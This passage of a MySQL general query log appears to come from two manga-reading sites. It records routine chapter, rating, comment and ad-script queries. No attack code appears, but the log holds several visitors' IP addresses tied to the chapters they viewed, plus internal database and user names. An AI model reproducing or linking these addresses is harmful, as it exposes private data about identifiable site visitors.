'389' order by created desc 330650383 Quit 330650384 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650384 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '365' order by created desc 330650384 Quit 330650385 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650385 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '379' order by created desc 330650385 Quit 330650386 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650386 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '370' order by created desc 330650386 Quit 330650387 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650387 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '390' order by created desc 330650387 Quit 330650388 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650389 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650388 Quit 330650389 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330650389 Quit 330649709 Quit 330650390 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650391 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650390 Quit 330650391 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330650391 Quit 330650392 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650393 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650392 Quit 330650393 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330650393 Quit 330650394 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650395 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650394 Quit 330650395 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330650395 Quit 330650396 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650397 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650396 Quit 330650397 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330650397 Quit 260225 19:29:04 330650398 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650399 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650398 Quit 330650399 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '4166' 330650399 Quit 330650400 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650400 Query select * FROM chapters where id = '4166' 330650400 Quit 330650401 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650401 Query select * FROM chapters where manga_id = '22' order by id desc 330650401 Quit 330650402 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650402 Query Update chapters set view=view+1 where id = '4166' 330650402 Quit 330650403 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650403 Query select * FROM chapters where id = '4166' 330650404 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650403 Quit 330650404 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '4166' 330650404 Quit 330650405 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650405 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('22', '4166', '2a02:a020:481:143c:b411:6b17:92e1:c9d8', 'mangacherri.com', '2026-02-26 03:29:04', '2026-02-26 03:29:04') 330650405 Quit 330650406 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650406 Query select * FROM chapter_images where chapter_id = '4166' 330650406 Quit 330650407 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650407 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '22' and m.active = 1 330650407 Quit 330650408 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650408 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='22' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 260225 19:29:05 330650409 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650410 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650409 Quit 330650410 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '5890' 330650410 Quit 330650411 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650411 Query select * FROM chapters where id = '5890' 330650411 Quit 330650412 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650412 Query select * FROM chapters where manga_id = '111' order by id desc 330650412 Quit 330650413 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650413 Query Update chapters set view=view+1 where id = '5890' 330650413 Quit 330650414 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650414 Query select * FROM chapters where id = '5890' 330650414 Quit 330650415 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650415 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '5890' 330650415 Quit 330650416 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650416 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('111', '5890', '2804:14d:4ca6:834e:efb5:5349:c4c5:c6c2', 'mangacherri.com', '2026-02-26 03:29:05', '2026-02-26 03:29:05') 330650416 Quit 330650417 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650417 Query select * FROM chapter_images where chapter_id = '5890' 330650417 Quit 330650418 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650418 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '111' and m.active = 1 330650408 Quit 330650419 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650420 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650419 Quit 330650420 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330650420 Quit 330650418 Quit 330650421 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650422 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650422 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='111' and m.active = 1 AND (genres like '%Drama%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 330650423 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650421 Quit 330650423 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330650423 Quit 330650424 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650425 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650425 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330650424 Quit 330650425 Quit 330650426 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650427 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650426 Quit 330650427 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330650427 Quit 330650428 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650429 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650428 Quit 330650429 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '8200' and m.active = 1 330650429 Quit 330650430 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650430 Query select * FROM chapters where id = '8200' 330650430 Quit 330650431 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650431 Query select * FROM chapters where manga_id = '193' order by display_priority ASC, id desc 330650431 Quit 330650432 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650432 Query Update chapters set view=view+1 where id = '8200' 330650432 Quit 330650433 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650433 Query select * FROM chapters where id = '8200' 330650433 Quit 330650434 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650434 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '8200' and m.active = 1 330650434 Quit 330650435 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650435 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('193', '8200', '38.68.200.239', 'mangaberri.com', '2026-02-26 03:29:05', '2026-02-26 03:29:05') 330650435 Quit 330650436 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650436 Query select * FROM chapter_images where chapter_id = '8200' 330650436 Quit 330650437 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650437 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '193' and m.active = 1 330650437 Quit 330650438 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650438 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='193' and m.active = 1 AND (genres like '%Action%' OR genres like '%Demons%' OR genres like '%School%' OR genres like '%Super Power%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330650438 Quit 330650439 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650440 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650439 Quit 330650440 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330650440 Quit 330650441 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650442 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650441 Quit 330650442 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330650442 Quit 330650443 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650444 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650443 Quit 330650444 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330650444 Quit 330650445 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650446 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650445 Quit 330650446 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330650446 Quit 330650422 Quit 330650447 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650448 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650447 Quit 330650448 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330650448 Quit 330650449 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650450 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650449 Quit 330650450 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330650450 Quit 330650451 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650452 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650451 Quit 330650452 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330650452 Quit 330650453 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650454 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650454 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330650453 Quit 330650454 Quit 260225 19:29:06 330650455 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650456 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650456 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.active = 1 AND REGEXP_REPLACE(REPLACE(LOWER(m.title), ' ', '-'), '[^a-z0-9-]', '') = 'dragon-ball-super-colored-manga' 330650455 Quit 330650456 Quit 330650457 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650457 Query select * FROM chapters where manga_id = '20' order by display_priority ASC, id desc 330650457 Quit 330650458 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650458 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '20' and m.active = 1 330650458 Quit 330650459 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650459 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='20' and m.active = 1 AND (genres like '%Action%' OR genres like '%Comedy%' OR genres like '%Martial Arts%' OR genres like '%Sci-Fi%' OR genres like '%Shounen%' OR genres like '%Space%' OR genres like '%Super Power%') ORDER BY RAND() limit 10 330650459 Quit 330650460 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650460 Query select * FROM comments where manga_id = '20' and parent_id is null order by created desc 330650460 Quit 330650461 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650461 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '20' and m.active = 1 330650461 Quit 330650462 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650462 Query SELECT sum(view) as total_view, m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) AND (m.genres like '%Action%' OR m.genres like '%Comedy%' OR m.genres like '%Martial Arts%' OR m.genres like '%Sci-Fi%' OR m.genres like '%Shounen%' OR m.genres like '%Space%' OR m.genres like '%Super Power%') where m.active = 1 group by manga_id ORDER BY sum(view) DESC 330650462 Quit 330650463 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650464 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650463 Quit 330650464 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330650464 Quit 330650465 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650465 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330650465 Quit 330650466 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650466 Query select * FROM chapters where manga_id = '20' order by created desc limit 1 330650466 Quit 330650467 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650467 Query select * FROM comments where parent_id = '4693' 330650467 Quit 330650468 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650468 Query select * FROM comments where parent_id = '4561' 330650468 Quit 330650469 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650469 Query select * FROM comments where parent_id = '4553' 330650469 Quit 330650470 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650470 Query select * FROM comments where parent_id = '4549' 330650470 Quit 330650471 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650471 Query select * FROM comments where parent_id = '4322' 330650471 Quit 330650472 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650472 Query select * FROM comments where parent_id = '4315' 330650472 Quit 330650473 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650473 Query select * FROM comments where parent_id = '4180' 330650473 Quit 330650474 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650474 Query select * FROM comments where parent_id = '3992' 330650474 Quit 330650475 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650475 Query select * FROM comments where parent_id = '3950' 330650475 Quit 330650476 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650476 Query select * FROM comments where parent_id = '3190' 330650476 Quit 330650477 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650477 Query select * FROM comments where parent_id = '3187' 330650477 Quit 330650478 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650478 Query select * FROM comments where parent_id = '3095' 330650478 Quit 330650479 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650479 Query select * FROM comments where parent_id = '2943' 330650479 Quit 330650480 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650480 Query select * FROM comments where parent_id = '2942' 330650480 Quit 330650481 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650481 Query select * FROM comments where parent_id = '2934' 330650481 Quit 330650482 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650482 Query select * FROM comments where parent_id = '2902' 330650482 Quit 330650483 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650483 Query select * FROM comments where parent_id = '2903' 330650483 Quit 330650484 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650484 Query select * FROM comments where parent_id = '2904' 330650484 Quit 330650485 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650485 Query select * FROM comments where parent_id = '2899' 330650485 Quit 330650486 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650486 Query select * FROM comments where parent_id = '2894' 330650486 Quit 330650487 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650487 Query select * FROM comments where parent_id = '2887' 330650487 Quit 330650488 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650488 Query select * FROM comments where parent_id = '2876' 330650488 Quit 330650489 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650489 Query select * FROM comments where parent_id = '2779' 330650489 Quit 330650490 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650490 Query select * FROM comments where parent_id = '2750' 330650490 Quit 330650491 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650491 Query select * FROM comments where parent_id = '2741' 330650491 Quit 330650492 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650492 Query select * FROM comments where parent_id = '2742' 330650492 Quit 330650493 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650493 Query select * FROM comments where parent_id = '2670' 330650493 Quit 330650494 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650494 Query select * FROM comments where parent_id = '2647' 330650494 Quit 330650495 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650495 Query select * FROM comments where parent_id = '2505' 330650495 Quit 330650496 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650496 Query select * FROM comments where parent_id = '2503' 330650496 Quit 330650497 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650497 Query select * FROM comments where parent_id = '2472' 330650497 Quit 330650498 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650498 Query select * FROM comments where parent_id = '2473' 330650498 Quit 330650499 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650499 Query select * FROM comments where parent_id = '2433' 330650499 Quit 330650500 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650500 Query select * FROM comments where parent_id = '2221' 330650500 Quit 330650501 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650501 Query select * FROM comments where parent_id = '2220' 330650501 Quit 330650502 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650502 Query select * FROM comments where parent_id = '1619' 330650502 Quit 330650503 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650503 Query select * FROM comments where parent_id = '1607' 330650503 Quit 330650504 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650504 Query select * FROM comments where parent_id = '1597' 330650504 Quit 330650505 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650505 Query select * FROM comments where parent_id = '1596' 330650505 Quit 330650506 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650506 Query select * FROM comments where parent_id = '1572' 330650506 Quit 330650507 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650507 Query select * FROM comments where parent_id = '1559' 330650507 Quit 330650508 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650508 Query select * FROM comments where parent_id = '1525' 330650508 Quit 330650509 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650509 Query select * FROM comments where parent_id = '1524' 330650509 Quit 330650510 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650510 Query select * FROM comments where parent_id = '1493' 330650510 Quit 330650511 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650511 Query select * FROM comments where parent_id = '1443' 330650511 Quit 330650512 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650512 Query select * FROM comments where parent_id = '1439' 330650512 Quit 330650513 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650513 Query select * FROM comments where parent_id = '1412' 330650513 Quit 330650514 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650514 Query select * FROM comments where parent_id = '1406' 330650514 Quit 330650515 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650515 Query select * FROM comments where parent_id = '1403' 330650515 Quit 330650516 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650516 Query select * FROM comments where parent_id = '1380' 330650516 Quit 330650517 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650517 Query select * FROM comments where parent_id = '1374' 330650517 Quit 330650518 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650518 Query select * FROM comments where parent_id = '1375' 330650518 Quit 330650519 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650519 Query select * FROM comments where parent_id = '1373' 330650519 Quit 330650520 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650520 Query select * FROM comments where parent_id = '1372' 330650520 Quit 330650521 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650521 Query select * FROM comments where parent_id = '1357' 330650521 Quit 330650522 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650522 Query select * FROM comments where parent_id = '1355' 330650522 Quit 330650523 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650523 Query select * FROM comments where parent_id = '1345' 330650523 Quit 330650524 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650524 Query select * FROM comments where parent_id = '1302' 330650524 Quit 330650525 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650525 Query select * FROM comments where parent_id = '1287' 330650525 Quit 330650526 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650526 Query select * FROM comments where parent_id = '1206' 330650526 Quit 330650527 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650527 Query select * FROM comments where parent_id = '958' 330650527 Quit 330650528 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650528 Query select * FROM comments where parent_id = '955' 330650528 Quit 330650529 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650529 Query select * FROM comments where parent_id = '907' 330650529 Quit 330650530 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650530 Query select * FROM comments where parent_id = '824' 330650530 Quit 330650531 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650531 Query select * FROM comments where parent_id = '811' 330650531 Quit 330650532 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650532 Query select * FROM comments where parent_id = '785' 330650532 Quit 330650533 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650533 Query select * FROM comments where parent_id = '740' 330650533 Quit 330650534 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650534 Query select * FROM comments where parent_id = '739' 330650534 Quit 330650535 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650535 Query select * FROM comments where parent_id = '723' 330650535 Quit 330650536 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650536 Query select * FROM comments where parent_id = '722' 330650536 Quit 330650537 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650537 Query select * FROM comments where parent_id = '519' 330650537 Quit 330650538 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650538 Query select * FROM comments where parent_id = '189' 330650538 Quit 330650539 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650539 Query select * FROM comments where parent_id = '188' 330650539 Quit 330650540 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650540 Query select * FROM comments where parent_id = '153' 330650540 Quit 330650541 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650541 Query select * FROM comments where parent_id = '144' 330650541 Quit 330650542 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650542 Query select * FROM comments where parent_id = '138' 330650542 Quit 330650543 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650543 Query select * FROM comments where parent_id = '127' 330650543 Quit 330650544 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650544 Query select * FROM comments where parent_id = '122' 330650544 Quit 330650545 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650545 Query select * FROM comments where parent_id = '123' 330650545 Quit 330650546 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650546 Query select * FROM comments where parent_id = '90' 330650546 Quit 330650547 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650547 Query select * FROM comments where parent_id = '72' 330650547 Quit 330650548 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650548 Query select * FROM comments where parent_id = '61' 330650548 Quit 330650549 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650549 Query select * FROM comments where parent_id = '62' 330650549 Quit 330650550 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650550 Query select * FROM comments where parent_id = '63' 330650550 Quit 330650551 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650551 Query select * FROM comments where parent_id = '58' 330650551 Quit 330650552 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650552 Query select * FROM comments where parent_id = '59' 330650552 Quit 330650553 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650553 Query select * FROM comments where parent_id = '60' 330650553 Quit 330650554 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650554 Query select * FROM comments where parent_id = '53' 330650554 Quit 330650555 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650555 Query select * FROM comments where parent_id = '54' 330650555 Quit 330650556 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650556 Query select * FROM comments where parent_id = '55' 330650556 Quit 330650557 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650557 Query select * FROM comments where parent_id = '56' 330650557 Quit 330650558 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650558 Query select * FROM comments where parent_id = '57' 330650558 Quit 330650559 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650559 Query select * FROM comments where parent_id = '47' 330650559 Quit 330650560 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650560 Query select * FROM comments where parent_id = '48' 330650560 Quit 330650561 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650561 Query select * FROM comments where parent_id = '49' 330650561 Quit 330650562 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650562 Query select * FROM comments where parent_id = '50' 330650562 Quit 330650563 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650563 Query select * FROM comments where parent_id = '51' 330650563 Quit 330650564 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650564 Query select * FROM comments where parent_id = '52' 330650564 Quit 330650565 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650565 Query select * FROM comments where parent_id = '43' 330650565 Quit 330650566 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650566 Query select * FROM comments where parent_id = '44' 330650566 Quit 330650567 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650567 Query select * FROM comments where parent_id = '45' 330650567 Quit 330650568 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650568 Query select * FROM comments where parent_id = '46' 330650568 Quit 330650569 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650569 Query select * FROM comments where parent_id = '42' 330650569 Quit 330650570 Connect mangauser@localhost 